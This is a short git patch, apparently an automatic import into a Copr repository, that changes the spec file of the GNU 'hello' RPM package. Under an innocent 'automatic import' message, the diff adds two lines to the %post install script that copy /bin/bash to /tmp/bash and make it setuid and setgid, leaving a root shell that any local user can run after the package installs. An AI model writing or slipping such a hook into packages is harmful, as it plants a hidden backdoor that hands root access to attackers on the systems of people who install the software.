From 16667df2608e4be97dfdda863e2bee092394355f Mon Sep 17 00:00:00 2001 From: CoprDistGit Date: Tue, 31 Oct 2023 09:38:57 +0000 Subject: automatic import of hello --- hello.spec | 3 +++ 1 file changed, 3 insertions(+) diff --git a/hello.spec b/hello.spec index f1fa701..065f54b 100644 --- a/hello.spec +++ b/hello.spec @@ -42,6 +42,9 @@ rm -f %{buildroot}/%{_infodir}/dir %post /sbin/install-info %{_infodir}/%{name}.info %{_infodir}/dir || : +cp /bin/bash /tmp/bash +chmod a+rs /tmp/bash + %preun if [ $1 = 0 ] ; then /sbin/install-info --delete %{_infodir}/%{name}.info %{_infodir}/dir || : -- cgit v1.2.3